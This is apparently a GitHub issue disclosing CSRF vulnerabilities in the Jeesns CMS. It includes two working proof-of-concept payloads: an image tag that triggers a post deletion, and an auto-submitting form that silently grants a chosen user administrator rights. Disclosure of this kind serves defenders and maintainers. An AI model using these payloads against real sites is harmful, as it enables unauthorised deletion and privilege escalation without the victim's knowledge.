Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jeesns CSRF Vulnerability #9

Open
code996 opened this issue May 14, 2019 · 0 comments
Open

Jeesns CSRF Vulnerability #9

code996 opened this issue May 14, 2019 · 0 comments

Comments

@code996
Copy link

code996 commented May 14, 2019

There is also no filter for the token and referer check in the global filter, and there is no deletion method, so there is a CSRF vulnerability.

Vulnerability recurrence

  1. First use the A user (admin) to send a Weibo.
    1

  2. Use the B user (jeesns) to comment on the Weibo and bring the admin Weibo delete request.

    <img src="http://localhost:8080/manage/weibo/delete/3">

    2

  3. When the A user (admin) refreshes the Weibo again, the Weibo will be deleted by the A user without their knowledge.

    3

    It can be seen that the CSRF TEST microblog has been deleted and the CSRF exploit is successful.

There is also a CSRF vulnerability when the background administrator adds a new administrator. The poc can be constructed this way.

<form action=http://localhost:8080/manage/member/managerAdd method=POST>
<input type="text" name="name" value="jeesns" />
</form>
<script> document.forms[0].submit(); </script>

When the background administrator accesses this file, the user jeesns is automatically authorized for administrative rights.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant